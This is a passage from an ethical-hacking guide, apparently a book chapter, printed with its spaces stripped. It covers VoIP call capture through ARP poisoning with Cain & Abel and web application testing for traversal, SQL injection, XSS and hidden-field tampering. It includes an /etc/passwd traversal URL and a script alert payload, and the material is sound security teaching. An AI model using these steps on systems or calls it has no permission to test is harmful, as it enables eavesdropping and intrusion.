CapturingandrecordingvoicetrafficIfyouhaveaccesstothewiredorwirelessnetwork,youcancaptureVoIPconversationseasily.ThisisagreatwaytoprovethatthenetworkandtheVoIPinstallationarevulnerable.Therearemanylegalissuesassociatedwithtappingintophoneconversations,somakesureyouhavepermissionandarecarefulnottoabuseyourtestresults.

YoucanuseCain&Abel(technicallyjustCainforthefeaturesIdemonstratehere)totapintoVoIPconversations.YoucandownloadCain&Abelfreeatwww.oxid.it/cain.html.UsingCain’sARPpoisonroutingfeature,youcanplugintothenetworkandhaveitcaptureVoIPtraffic:

1. LoadCain&AbelandthenclicktheSniffertabtoenterthenetworkanalyzer

http://voiphopper.sourceforge.net/

http://www.packetizer.com/ipmc/h323_vs_sip


http://www.netsparker.com

http://www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/index.html

http://www.voip-info.org/wiki/view/Sipsak

http://www.voipsa.org/Resources/tools.php


mode.

TheHostspageopensbydefault.

2. ClicktheStart/StopAPRicon(whichlookslikethenuclearwastesymbol).

TheARPpoisonroutingprocessstartsandenablesthebuilt-insniffer.

3. Clicktheblue+icontoaddhoststoperformARPpoisoningon.4. IntheMACAddressScannerwindowthatappears,ensurethatAllHostsin

MySubnetisselectedandthenclickOK.5. ClicktheAPRtab(theonewiththeyellow-and-blackcircleicon)toloadthe

APRpage.

6. ClickthewhitespaceundertheuppermostStatuscolumnheading(justundertheSniffertab).

Thisstepre-enablestheblue+icon.

7. Clicktheblue+iconandtheNewARPPoisonRoutingwindowshowsthehostsdiscoveredinStep3.

8. Selectyourdefaultrouteorotherhostthatyouwanttocapturepacketstravelingtoandfrom.

Ijustselectmydefaultroute,butyoumightconsiderselectingyourSIPmanagementsystemorothercentralVoIPsystem.Therightcolumnfillswithalltheremaininghosts.

9. Intherightcolumn,Ctrl+clickthesystemyouwanttopoisontocaptureitsvoicetraffic.

Inmycase,IselectmyVoIPnetworkadapter,butyoumightconsiderselectingallyourVoIPphones.

10. ClickOKtostarttheARPpoisoningprocess.

Thisprocesscantakeanywherefromafewsecondstoafewminutesdependingonyournetworkhardwareandeachhost’slocalTCP/IPstack.

11. ClicktheVoIPtabandallvoiceconversationsare“automagically”recorded.

Here’stheinterestingpart—theconversationsaresavedin.wavaudiofileformat,soyousimplyright-clicktherecordedconversationyouwanttotestandchoosePlay,asshowninFigure14-13.NotethatconversationsbeingrecordedshowRecording…intheStatuscolumn.

Figure14-13:UsingCain&Abeltocapture,record,andplaybackVoIPconversations.

ThevoicequalitywithCainandothertoolsdependsonthecodecyourVoIPdevicesuse.Withmyequipment,Ifindthequalityismarginalatbest.That’snotreallyabigdeal,though,becauseyourgoalistoprovethere’savulnerability—nottolisteninonotherpeople’sconversations.

There’salsoaLinux-basedtoolcalledvomit(http://vomit.xtdnet.nl)—shortforvoiceovermisconfiguredInternettelephones—thatyoucanusetoconvertVoIPconversationsinto.wavfiles.Youfirstneedtocapturetheactualconversationbyusingtcpdump,butifLinuxisyourpreference,thissolutionoffersbasicallythesameresultsasCain,outlinedintheprecedingsteps.

Ifyou’regoingtoworkalotwithVoIP,IhighlyrecommendyouinvestinagoodVoIPnetworkanalyzer.CheckoutWildPackets’OmniPeek—agreatall-in-onewiredandwirelessanalyzer(www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis—andTamoSoft’sCommView(www.tamos.com/products/commview),whichisagreatlow-pricedalternative.

TheseVoIPvulnerabilitiesareonlythetipoftheiceberg.Newsystems,software,andrelatedprotocolscontinuetoemerge,soitpaystoremainvigilant,helpingtoensureyourconversationsarelockeddownfromthosewithmaliciousintent.LikeI’vesaidbefore,ifithasanIPaddressoraURL,it’sfairgameforattack.

CountermeasuresagainstVoIPvulnerabilitiesLockingdownVoIPcanbetricky.Youcangetofftoagoodstart,though,bysegmentingyourvoicenetworkintoitsownVLAN—orevenadedicatedphysicalnetworkifthatfitsintoyourbudget.FurtherisolateanyInternet-connectedsystemssothatnotjustanyonecanconnecttothem(Iseethisoften).Youshouldalsomakesure

http://vomit.xtdnet.nl

http://www.savvius.com/products/overview/omnipeek_family/omnipeek_network_analysis


thatallVoIP-relatedsystemsarehardenedaccordingtovendorrecommendationsandwidelyacceptedbestpractices(suchasNIST’sSP800-58documentathttp://csrc.nist.gov/publications/nistpubs/800-58/SP800-58-final.pdf)andthatsoftwareandfirmwarearepatchedonaperiodicandconsistentbasis.

http://csrc.nist.gov/publications/nistpubs/800-58/SP800-58-final.pdf

Chapter15

WebApplicationsandMobileAppsInThisChapter

Testingwebsitesandwebapplications

Uncoveringflawsinmobileapps

ProtectingagainstSQLinjectionandcross-sitescripting

Preventingloginweaknesses

Manuallyanalyzingsoftwareflaws

Counteringwebabuse

Analyzingsourcecode

Websitesandwebapplicationsarecommontargetsforattackbecausethey’reeverywhereandoftenopenforanyonetopokeandprod.Basicwebsitesusedformarketing,contactinformation,documentdownloads,andsoonareespeciallyeasyforthebadguystoplayaroundwith.Commonly-usedwebplatformssuchasWordPressandrelatedcontentmanagementsystemsareespeciallyvulnerabletoattackbecauseoftheirpresenceandlackoftestingandpatching.Forcriminalhackers,websitesthatprovideafrontendtocomplexapplicationsanddatabasesthatstorevaluableinformation,suchascreditcardandSocialSecuritynumbers,areespeciallyattractive.Thisiswherethemoneyis,bothliterallyandfiguratively.

Whyarewebsitesandapplicationssovulnerable?Theconsensusisthatthey’revulnerablebecauseofpoorsoftwaredevelopmentandtestingpractices.Soundfamiliar?Itshould;thissameproblemaffectsoperatingsystemsandpracticallyallaspectsofcomputersystems,includingautomobilesandrelatedInternetofThings(IoT)systems.Thisisthesideeffectofrelyingonsoftwarecompilerstoperformerrorchecking,questionableuserdemandforhigher-qualitysoftware,andemphasizingtime-to-marketandusabilityoversecurity.

Thischapterpresentssecurityteststorunonyourwebsites,applications,andmobileapps.Givenallthecustomconfigurationpossibilitiesandsystemcomplexities,youcantestforliterallythousandsofsoftwarevulnerabilities.Inthischapter,IfocusontheonesIseemostoftenusingbothautomatedscannersandmanualanalysis.Ialsooutlinecountermeasurestohelpminimizethechancesthatsomeonewithillintentcancarryouttheseattacksagainstwhatarelikelyconsideredyourmostcriticalbusinesssystems.

Iwanttopointoutthatthischaptermerelyskimsthesurfaceofallpossiblesoftwaresecurityflawsandwaystotestforthem.Additionalsourcesforbuildingyourwebsecuritytestingskillsarethetoolsandstandards,suchastheTop10WebApplicationSecurityRisksandTop10MobileRisks,providedbytheOpen

WebApplicationSecurityProject(www.owasp.org).


ChoosingYourWebSecurityTestingToolsGoodwebsecuritytestingtoolscanhelpensurethatyougetthemostfromyourwork.Aswithmanythingsinlife,Ifindthatyougetwhatyoupayforwhenitcomestotestingforwebsecurityholes.ThisiswhyImostlyusecommercialtoolsinmyworkwhentestingwebsitesandwebapplicationsforvulnerabilities.

Thesearemyfavoritewebsecuritytestingtools:

AcunetixWebVulnerabilityScanner(www.acunetix.com)forall-in-onesecuritytesting,includingaportscannerandanHTTPsnifferAppSpider(www.rapid7.com/products/appspider)forall-in-onesecuritytestingincludingexcellentcapabilitiesforauthenticatedscanning

WebDeveloper(http://chrispederick.com/work/web-developer)formanualanalysisandmanipulationofwebpages

Yes,youmustdomanualanalysis.Youdefinitelywanttouseascanner,becausescannersfindaroundhalfoftheissues.Fortheotherhalf,youneedtodomuchmorethanjustrunautomatedscanningtools.Rememberthatyouhavetopickupwherescannersleaveofftotrulyassesstheoverallsecurityofyourwebsitesandapplications.Youhavetodosomemanualworknotbecausewebvulnerabilityscannersarefaulty,butbecausepokingandproddingwebsystemssimplyrequiregoodold-fashionedhackertrickeryandyourfavoritewebbrowser.

Netsparker(www.netsparker.com)forall-in-onesecuritytestingthatoftenuncoversvulnerabilitiestheothertoolsdonot

Youcanalsousegeneralvulnerabilityscanners,suchasNexposeandLanGuard,aswellasexploittools,suchasMetasploit,whentestingwebsitesandapplications.Youcanusethesetoolstofind(andexploit)weaknessesatthewebserverlevelthatyoumightnototherwisefindwithstandardweb-scanningtoolsandmanualanalysis.Googlecanbebeneficialforrootingthroughwebapplicationsandlookingforsensitiveinformationaswell.Althoughthesenon–application-specifictoolscanbebeneficial,it’simportanttoknowthattheywon’tdrilldownasdeepasthetoolsImentionintheprecedinglist.

http://www.acunetix.com/


http://chrispederick.com/work/web-developer/


SeekingOutWebVulnerabilitiesAttacksagainstvulnerablewebsitesandapplicationsviaHypertextTransferProtocol(HTTP)makeupthemajorityofallInternet-relatedattacks.MostoftheseattackscanbecarriedouteveniftheHTTPtrafficisencrypted(viaHTTPS,alsoknownasHTTPoverSSL/TLS)becausethecommunicationsmediumhasnothingtodowiththeseattacks.Thesecurityvulnerabilitiesactuallyliewithinthewebsitesandapplicationsthemselvesorthewebserverandbrowsersoftwarethatthesystemsrunonandcommunicatewith.

Manyattacksagainstwebsitesandapplicationsarejustminornuisancesandmightnotaffectsensitiveinformationorsystemavailability.However,someattackscanwreakhavoconyoursystems,puttingsensitiveinformationatriskandevenplacingyourorganizationoutofcompliancewithstate,federal,andinternationalinformationprivacyandsecuritylawsandregulations.

ManualanalysisrequiredItcannotbestressedenoughhowimportantitistoperformmanualanalysisofwebsitesandapplicationsusingagood,old-fashionedwebbrowser.Youmostcertainlycan’tlivewithoutwebvulnerabilityscanners,butyoubetternotdependonthemtofindeverythingbecausetheywon’t.Commonwebsecurityvulnerabilitiesthatyoumustcheckforinclude:

Specificpasswordrequirementsincludingwhetherornotcomplexityisenforced

Whetherornotintruderlockoutworksaftersomanyfailedloginattempts

Whetherornotencryption(ideallyTransportLayerSecurity[TLS]Version1.2)isusedtoprotectusersessions,especiallylogins

Usersessionhandlingincludingconfirmingthatsessioncookiesarechangedafterloginandlogoutandwhetherornotsessionstimeoutafterareasonableperiodoftime

Fileuploadcapabilitiesandwhethermalwarecanbeuploadedtothesystem

Youdon’tnecessarilyhavetoperformmanualanalysisofyourwebsitesandapplicationseverytimeyoutest,butyouneedtodoitperiodically—atleastonceortwiceayear.Don’tletanyonetellyouotherwise!

DirectorytraversalIstartyououtwithasimpledirectorytraversalattack.Directorytraversalisareallybasicweakness,butitcanturnupinteresting—sometimessensitive—informationaboutawebsystem.Thisattackinvolvesbrowsingasiteandlookingforcluesabouttheserver’sdirectorystructureandsensitivefilesthatmighthavebeenloadedintentionallyorunintentionally.

Performthefollowingteststodetermineinformationaboutyourwebsite’sdirectorystructure.

CrawlersAspiderprogram,suchasthefreeHTTrackWebsiteCopier(https://httrack.com),cancrawlyoursitetolookforeverypubliclyaccessiblefile.TouseHTTrack,simplyloadit,giveyourprojectaname,tellHTTrackwhichwebsite(s)tomirror,andafterafewminutes,possiblyhours(dependingonthesizeandcomplexityofthesite),you’llhaveeverythingthat’spubliclyaccessibleonthesitestoredonyourlocaldriveinc:\MyWebSites.Figure15-1showsthecrawloutputofabasicwebsite.

https://httrack.com

Figure15-1:UsingHTTracktocrawlawebsite.

Complicatedsitesoftenrevealalotmoreinformationthatshouldnotbethere,includingolddatafilesandevenapplicationscriptsandsourcecode.

Inevitably,whenperformingwebsecurityassessments,Istumbleacross.zipor.rarfilesonwebservers.Sometimestheycontainjunk,butoftentimestheyholdsensitiveinformationthatshouldn’tbethereforthepublictoaccess.Oneprojectinparticularstandsout.WhenIranacrossa.zipfileandtriedtoopenit,WinZipaskedmeforapassword.Usingmyhandydandy.zipfilepassword-crackingtoolfromElcomSoft(seeChapter8fordetailsonpasswordcracking),Ihadthepasswordinmeremilliseconds.Insidethe.zipfilewasanExcelspreadsheetcontainingsensitivepatienthealthcareinformation(names,addresses,SocialSecuritynumbers,andmore)thatanyoneandeveryoneintheworldcouldaccess.Insituationslikethis,yourbusinessmightberequiredtonotifyeveryoneinvolvedthattheirinformationwasinadequatelyprotectedandpossiblycompromised.Itpaystoknowthelawsandregulationsaffectingyourbusiness.Betteryet,makesureusersaren’tpostingimproperlysecuredsensitiveinformationonyourwebserversinthefirstplace!

Lookattheoutputofyourcrawlingprogramtoseewhatfilesareavailable.RegularHTMLandPDFfilesareprobablyokaybecausethey’remostlikelyneededfornormalwebusage.Butitwouldn’thurttoopeneachfiletomakesureitbelongsthereanddoesn’tcontainsensitiveinformationyoudon’twanttosharewiththeworld.

GoogleGoogle,thesearchenginecompanythatmanylovetohate,canalsobeusedfor

directorytraversal.Infact,Google’sadvancedqueriesaresopowerfulthatyoucanusethemtorootoutsensitiveinformation,criticalwebserverfilesanddirectories,creditcardnumbers,webcams—basicallyanythingthatGooglehasdiscoveredonyoursite—withouthavingtomirroryoursiteandsiftthrougheverythingmanually.It’salreadysittingthereinGoogle’scachewaitingtobeviewed.

ThefollowingareacoupleofadvancedGooglequeriesthatyoucanenterdirectlyintotheGooglesearchfield:

site:hostnamekeywords—Thisquerysearchesforanykeywordyoulist,suchasSSN,confidential,creditcard,andsoon.Anexamplewouldbe:

site:www.principlelogic.comspeaker

filetype:file-extensionsite:hostname—Thisquerysearchesforspecificfiletypesonaspecificwebsite,suchasdoc,pdf,db,dbf,zip,andmore.Thesefiletypesmightcontainsensitiveinformation.Anexamplewouldbe:

filetype:pdfsite:www.principlelogic.com

OtheradvancedGoogleoperatorsincludethefollowing:

allintitlesearchesforkeywordsinthetitleofawebpage.inurlsearchesforkeywordsintheURLofawebpage.relatedfindspagessimilartothiswebpage.linkshowsothersitesthatlinktothiswebpage.

Specificdefinitionsandmorecanbefoundatwww.googleguide.com/advanced_operators.html.ManywebvulnerabilityscannersalsoperformchecksagainsttheGoogleHackingDatabase(GHDB)sitewww.exploit-db.com/google-hacking-database.

WhensiftingthroughyoursitewithGoogle,besuretolookforsensitiveinformationaboutyourservers,network,andorganizationinGoogleGroups(http://groups.google.com),whichistheUsenetarchive.Ihavefoundemployeepostingsinnewsgroupsthatrevealtoomuchabouttheinternalnetworkandbusinesssystems—theskyisthelimit.Ifyoufindsomethingthatdoesn’tneedtobethere,youcanworkwithGoogletohaveiteditedorremoved.Formoreinformation,refertoGoogle’sContactuspageatwww.google.com/intl/en/contact.

Lookingatthebiggerpictureofwebsecurity,Googlehackingisprettylimited,butifyou’rereallyintoit,checkoutJohnnyLong’sbook,GoogleHackingforPenetrationTesters(Syngress).

Countermeasuresagainstdirectorytraversals

http://www.principlelogic.com


http://www.googleguide.com/advanced_operators.html

https://www.exploit-db.com/google-hacking-database

http://groups.google.com/

http://www.google.com/intl/en/contact

Youcanemploythreemaincountermeasuresagainsthavingfilescompromisedviamaliciousdirectorytraversals:

Don’tstoreold,sensitive,orotherwisenonpublicfilesonyourwebserver.Theonlyfilesthatshouldbeinyour/htdocsorDocumentRootfolderarethosethatareneededforthesitetofunctionproperly.Thesefilesshouldnotcontainconfidentialinformationthatyoudon’twanttheworldtosee.Configureyourrobots.txtfiletopreventsearchengines,suchasGoogle,fromcrawlingthemoresensitiveareasofyoursite.

Ensurethatyourwebserverisproperlyconfiguredtoallowpublicaccesstoonlythosedirectoriesthatareneededforthesitetofunction.Minimumprivilegesarekeyhere,soprovideaccesstoonlythefilesanddirectoriesneededforthewebapplicationtoperformproperly.

Checkyourwebserver’sdocumentationforinstructionsoncontrollingpublicaccess.Dependingonyourwebserverversion,theseaccesscontrolsaresetin

Thehttpd.conffileandthe.htaccessfilesforApache(Seehttp://httpd.apache.org/docs/current/configuring.htmlformoreinformation.)InternetInformationServicesManagerforIIS

Thelatestversionsofthesewebservershavegooddirectorysecuritybydefaultso,ifpossible,makesureyou’rerunningthelatestversions.

Finally,considerusingasearchenginehoneypot,suchastheGoogleHackHoneypot(http://ghh.sourceforge.net).Ahoneypotdrawsinmalicioususerssoyoucanseehowthebadguysareworkingagainstyoursite.Then,youcanusetheknowledgeyougaintokeepthematbay.

Input-filteringattacksWebsitesandapplicationsarenotoriousfortakingpracticallyanytypeofinput,mistakenlyassumingthatit’svalid,andprocessingitfurther.Notvalidatinginputisoneofthegreatestmistakesthatwebdeveloperscanmake.

Severalattacksthatinsertmalformeddata—often,toomuchatonetime—canberunagainstawebsiteorapplication,whichcanconfusethesystemandmakeitdivulgetoomuchinformationtotheattacker.Inputattackscanalsomakeiteasyforthebadguystogleansensitiveinformationfromthewebbrowsersofunsuspectingusers.

BufferoverflowsOneofthemostseriousinputattacksisabufferoverflowthatspecificallytargetsinputfieldsinwebapplications.

http://httpd.apache.org/docs/current/configuring.html

http://ghh.sourceforge.net/

Forinstance,acredit-reportingapplicationmightauthenticateusersbeforethey’reallowedtosubmitdataorpullreports.TheloginformusesthefollowingcodetograbuserIDswithamaximuminputof12characters,asdenotedbythemaxsizevariable:

<formname="Webauthenticate"action="www.your_web_app.com/

login.cgi"method="POST">

…

<inputtype="text"name="inputname"maxsize="12">

…

Atypicalloginsessionwouldinvolveavalidloginnameof12charactersorfewer.However,themaxsizevariablecanbechangedtosomethinghuge,suchas100oreven1,000.Thenanattackercanenterbogusdataintheloginfield.Whathappensnextisanyone’scall—theapplicationmighthang,overwriteotherdatainmemory,orcrashtheserver.

Asimplewaytomanipulatesuchavariableistostepthroughthepagesubmissionbyusingawebproxy,suchasthosebuiltintothecommercialwebvulnerabilityscannersImentionorthefreeBurpProxy(https://portswigger.net/burp/proxy.html).

Webproxiessitbetweenyourwebbrowserandtheserveryou’retestingandallowyoutomanipulateinformationsenttotheserver.Tobegin,youmustconfigureyourwebbrowsertousethelocalproxyof127.0.0.1onport8080.ToaccessthisinFirefox,chooseOptions,clickAdvanced,clicktheNetworktab,clicktheConnectionSettingsbutton,andthenselecttheManualProxyConfigurationradiobutton.InInternetExplorer,choosetheGearicon ⇒ InternetOptions,thenclicktheLANSettingsbuttonunderConnections,selecttheUseaproxyserverforyourLANradiobutton,andentertheappropriatehostname/IPaddressandportnumber.

Allyouhavetodoischangethefieldlengthofthevariablebeforeyourbrowsersubmitsthepage,anditwillbesubmittedusingwhateverlengthyougive.YoucanalsousetheWebDevelopertoremovemaximumformlengthsdefinedinwebforms,asshowninFigure15-2.

https://portswigger.net/burp/proxy.html

Figure15-2:UsingFirefoxWebDevelopertoresetformfieldlengths.

URLmanipulationAnautomatedinputattackmanipulatesaURLandsendsitbacktotheserver,tellingthewebapplicationtodovariousthings,suchasredirecttothird-partysites,loadsensitivefilesofftheserver,andsoon.Localfileinclusionisonesuchvulnerability.ThisiswhenthewebapplicationacceptsURL-basedinputandreturnsthespecifiedfile’scontentstotheusersuchasinthefollowingexampleofanattemptedbreachofaLinuxserver’spasswdfile:

https://www.your_web_app.com/onlineserv/Checkout.cgi?state=

detail&language=english&imageSet=/../..//../..//../..//../

..///etc/passwd

It’simportanttonotethatmostrecentapplicationplatformssuchasASP.NETandJavaareprettygoodaboutnotallowingsuchmanipulationoftheURLvariables,butIdostillseethisvulnerabilityperiodically.

ThefollowinglinksdemonstrateanotherexampleofURLtrickerycalledURLredirection:

http://www.your_web_app.com/error.aspx?URL=http://www.

bad~site.com&ERROR=Path+’OPTIONS’+is+forbidden.

http://www.your_web_app.com/exit.asp?URL=http://www.

bad~site.com

Inbothsituations,anattackercanexploitthisvulnerabilitybysendingthelinktounsuspectingusersviae-mailorbypostingitonawebsite.Whenusersclickthelink,theycanberedirectedtoamaliciousthird-partysitecontainingmalwareorinappropriatematerial.

Ifyouhavenothingbuttimeonyourhands,youmightuncoverthesetypesofvulnerabilitiesmanually.However,intheinterestofaccuracy(andsanity),theseattacksarebestcarriedoutbyrunningawebvulnerabilityscannerbecausetheycandetecttheweaknessbysendinghundredsandhundredsofURLiterationstothewebsystemveryquickly.

HiddenfieldmanipulationSomewebsitesandapplicationsembedhiddenfieldswithinwebpagestopassstateinformationbetweenthewebserverandthebrowser.Hiddenfieldsarerepresentedinawebformas<inputtype=“hidden”>.Becauseofpoorcodingpractices,hiddenfieldsoftencontainconfidentialinformation(suchasproductpricesonane-commercesite)thatshouldbestoredonlyinaback-enddatabase.Usersshouldn’tseehiddenfields—hencethename—butthecuriousattackercandiscoverandexploitthemwiththesesteps:

1. ViewtheHTMLsourcecode.

ToseethesourcecodeinInternetExplorerandFirefox,youcanusuallyright-clickonthepageandselectViewsourceorViewPageSource.

2. Changetheinformationstoredinthesefields.

Forexample,amalicioususermightchangethepricefrom$100to$10.

3. Repostthepagebacktotheserver.

Thisstepallowstheattackertoobtainill-gottengains,suchasalowerpriceonawebpurchase.

Suchvulnerabilitiesarebecomingrare,butlikeURLmanipulation,thepossibilityexistssoitpaystokeepaneyeout.

Usinghiddenfieldsforauthentication(login)mechanismscanbeespeciallydangerous.Ioncecameacrossamultifactorauthenticationintruderlockoutprocessthatreliedonahiddenfieldtotrackthenumberoftimestheuserattemptedtologin.Thisvariablecouldberesettozeroforeachloginattemptandthusfacilitateascripteddictionaryorbrute-forceloginattack.Itwassomewhatironicthatthesecuritycontroltopreventintruderattackswasvulnerabletoanintruderattack.

Severaltools,suchastheproxiesthatcomewithcommercialwebvulnerabilityscannersorBurpProxy,caneasilymanipulatehiddenfields.Figure15-3showstheWebInspectSPIProxyinterfaceandawebpage’shiddenfield.

Figure15-3:UsingWebInspecttofindandmanipulatehiddenfields.

Ifyoucomeacrosshiddenfields,youcantrytomanipulatethemtoseewhatcanbedone.It’sassimpleasthat.

CodeinjectionandSQLinjectionSimilartoURLmanipulationattacks,code-injectionattacksmanipulatespecificsystemvariables.Here’sanexample:

http://www.your_web_app.com/script.php?info_variable=X

Attackerswhoseethisvariablecanstartenteringdifferentdataintotheinfo_variablefield,changingXtosomethinglikeoneofthefollowinglines:

http://www.your_web_app.com/script.php?info_variable=Y

http://www.your_web_app.com/script.php?info_variable=123XYZ

Thisisarudimentaryexamplebut,nonetheless,thewebapplicationmightrespondinawaythatgivesattackersmoreinformationthantheywant,suchasdetailederrorsoraccessintodatafieldsthey’renotauthorizedtoaccess.Theinvalidinputmightalsocausetheapplicationortheservertohang.Similartothecasestudyearlierinthe

chapter,hackerscanusethisinformationtodeterminemoreaboutthewebapplicationanditsinnerworkings,whichcanultimatelyleadtoaserioussystemcompromise.

IfHTTPvariablesarepassedintheURLandareeasilyaccessible,it’sonlyamatteroftimebeforesomeoneexploitsyourwebapplication.

Ionceusedawebapplicationtomanagesomepersonalinformationthatdidjustthis.Becausea“name”parameterwaspartoftheURL,anyonecouldgainaccesstootherpeople’spersonalinformationbychangingthe“name”value.Forexample,iftheURLincluded“name=kbeaver”,asimplechangeto“name=jsmith”wouldbringupJ.Smith’shomeaddress,SocialSecuritynumber,andsoon.Ouch!Ialertedthesystemadministratortothisvulnerability.Afterafewminutesofdenial,heagreedthatitwasindeedaproblemandproceededtoworkwiththedeveloperstofixit.

Codeinjectioncanalsobecarriedoutagainstback-endSQLdatabases—anattackknownasSQLinjection.MaliciousattackersinsertSQLstatements,suchasCONNECT,SELECT,andUNION,intoURLrequeststoattempttoconnectandextractinformationfromtheSQLdatabasethatthewebapplicationinteractswith.SQLinjectionismadepossiblebyapplicationsnotproperlyvalidatinginputcombinedwithinformativeerrorsreturnedfromdatabaseserversandwebservers.

TwogeneraltypesofSQLinjectionarestandard(alsocallederror-based)andblind.Error-basedSQLinjectionisexploitedbasedonerrormessagesreturnedfromtheapplicationwheninvalidinformationisinputintothesystem.BlindSQLinjectionhappenswhenerrormessagesaredisabled,requiringthehackerorautomatedtooltoguesswhatthedatabaseisreturningandhowit’srespondingtoinjectionattacks.

There’saquick(althoughnotreliableasmuchasitusedtobe)waytodeterminewhetheryourwebapplicationisvulnerabletoSQLinjection.Simplyenterasingleapostrophe(’)inyourwebformfieldsorattheendoftheURL.IfaSQLerrorisreturned,oddsaregoodthatSQLinjectionispresent.

You’redefinitelygoingtogetwhatyoupayforwhenitcomestoscanningforanduncoveringSQLinjectionflawswithawebvulnerabilityscanner.AswithURLmanipulation,you’remuchbetteroffrunningawebvulnerabilityscannertocheckforSQLinjection,whichallowsanattackertoinjectdatabasequeriesandcommandsthroughthevulnerablepagetothebackenddatabase.Figure15-4showsnumerousSQLinjectionvulnerabilitiesdiscoveredbytheNetsparkervulnerabilityscanner.

Figure15-4:NetsparkerdiscoveredSQLinjectionvulnerabilities.

WhenyoudiscoverSQLinjectionvulnerabilities,youmightbeinclinedtostopthereandnottrytoexploittheweakness.That’sfine.However,IprefertoseehowfarIcangetintothedatabasesystem.IrecommendusinganySQLinjectioncapabilitiesbuiltintoyourwebvulnerabilityscannerifpossiblesoyoucandemonstratetheflawtomanagement.

Ifyourbudgetislimited,youmayconsiderusingafreeSQLinjectiontoolsuchasSQLPowerInjector(www.sqlpowerinjector.com)ortheFirefoxAdd-on,SQLInjectMe(https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me).

IcoverdatabasesecuritymoreindepthinChapter16.

Cross-sitescriptingCross-sitescripting(XSS)isperhapsthemostwell-known—andwidespread—webvulnerabilitythatoccurswhenawebpagedisplaysuserinput—typicallyviaJavaScript—thatisn’tproperlyvalidated.Acriminalhackercantakeadvantageoftheabsenceofinputfilteringandcauseawebpagetoexecutemaliciouscodeonanyuser’scomputerthatviewsthepage.

Forexample,anXSSattackcandisplaytheuserIDandpasswordloginpagefromanotherroguewebsite.IfusersunknowinglyentertheiruserIDsandpasswordsintheloginpage,theuserIDsandpasswordsareenteredintothehacker’swebserverlogfile.Othermaliciouscodecanbesenttoavictim’scomputerandrunwiththesame

http://www.sqlpowerinjector.com/

https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me

securityprivilegesasthewebbrowserore-mailapplicationthat’sviewingitonthesystem;themaliciouscodecouldprovideahackerwithfullRead/Writeaccesstobrowsercookies,browserhistoryfiles,orevenpermitthedownload/installationofmalware.

AsimpletestshowswhetheryourwebapplicationisvulnerabletoXSS.Lookforanyfieldsintheapplicationthatacceptuserinput(suchasonaloginorsearchform),andenterthefollowingJavaScriptstatement:

<script>alert('XSS')</script>

IfawindowpopsupthatreadsXSS,asshowninFigure15-5,theapplicationisvulnerable.TheXSS-MeFirefoxAdd-on(https://addons.mozilla.org/en-US/firefox/addon/xss-me/)isanovelwaytotestforthisvulnerabilityaswell.

Figure15-5:Scriptcodereflectedtothebrowser.

TherearemanymoreiterationsforexploitingXSS,suchasthoserequiringuserinteractionviatheJavaScriptonmouseoverfunction.AswithSQLinjection,youreallyneedtouseanautomatedscannertocheckforXSS.BothNetsparkerandAcunetixWebVulnerabilityScannerdoagreatjoboffindingXSS.However,theyoftentendtofinddifferentXSSissues,adetailthathighlightstheimportanceofusingmultiplescannerswhenyoucan.Figure15-6showssomesampleXSSfindingsinAcunetixWebVulnerabilityScanner.

https://addons.mozilla.org/en-US/firefox/addon/xss-me/

Figure15-6:UsingAcunetixWebVulnerabilityScannertofindcross-sitescriptinginawebapplication.

Anotherwebvulnerabilityscannerthat’sverygoodatuncoveringXSSthatmanyotherscannerswon’tfindisAppSpider(formerlyNTOSpider)fromRapid7(www.rapid7.com/products/appspider).Inmyexperience,AppSpiderworksbetterthanotherscannersatperformingauthenticatedscansagainstapplicationsthatusemulti-factorauthenticationsystems.AppSpidershoulddefinitelybeonyourradar.Neverforgetthis:Whenitcomestowebvulnerabilities,themorescannersthebetter!Ifanything,someoneelsemightendupusingoneofthescannersyoudon’tuse!

CountermeasuresagainstinputattacksWebsitesandapplicationsmustfilterincomingdata.It’sassimpleasthat.Thesitesandapplicationsmustcheckandensurethatthedataenteredfitswithintheparametersofwhattheapplicationisexpecting.Ifthedatadoesn’tmatch,theapplicationshouldgenerateanerrororreturntothepreviouspage.Undernocircumstancesshouldtheapplicationacceptthejunkdata,processit,andreflectitbacktotheuser.

Securesoftwarecodingpracticescaneliminatealltheseissuesifthey’remadeacriticalpartofthedevelopmentprocess.Developersshouldknowandimplementthesebestpractices:

Neverpresentstaticvaluesthatthewebbrowserandtheuserdon’tneedtosee.Instead,thisdatashouldbeimplementedwithinthewebapplicationontheserversideandretrievedfromadatabaseonlywhenneeded.


Filterout<script>tagsfrominputfields.Disabledetailedwebserveranddatabase-relatederrormessagesifpossible.

SensitiveinformationstoredlocallyQuiteoftenaspartofmysecuritytesting,Iuseahexeditortoseehowanapplicationisstoringsensitiveinformation,suchaspasswords,inmemory.WhenI’musingFirefoxandInternetExplorer,Icanuseahexeditor,suchasWinHex(www.x-ways.net/winhex),tosearchtheactivememoryintheseprogramsandfrequentlyfinduserIDandpasswordcombinations.

I’vefoundthatwithInternetExplorerthisinformationiskeptinmemoryevenafterbrowsingtoseveralotherwebsitesorloggingoutoftheapplication.Thismemoryusagefeatureposesasecurityriskonthelocalsystemifanotheruseraccessesthecomputerorifthesystemisinfectedwithmalwarethatcansearchsystemmemoryforsensitiveinformation.ThewaybrowsersstoresensitiveinformationinmemoryisalsobadnewsifanapplicationerrororsystemmemorydumpoccursandtheuserendsupsendingtheinformationtoMicrosoft(oranotherbrowservendor)forQApurposes.It’salsobadnewsiftheinformationiswrittentoadumpfileonthelocalharddriveandsitsthereforsomeonetofind.

Trysearchingforsensitiveinformationstoredinmemoryrelatedonyourwebapplication(s)oronstandaloneprogramsthatrequireauthentication.Youjustmightbesurprisedattheoutcome.Outsideofobfuscatingorencodingthelogincredentials,there’sunfortunatelynotagreatfixbecausethis“feature”ispartofthewebbrowserthatdeveloperscan’treallycontrol.

AsimilarsecurityfeatureoccursontheclientsidewhenHTTPGETrequestsratherthanHTTPPOSTrequestsareusedtoprocesssensitiveinformation.ThefollowingisanexampleofavulnerableGETrequest:

https://www.your_web_app.com/access.php?username=kbeaver&password=WhAteVur!&login=SoOn

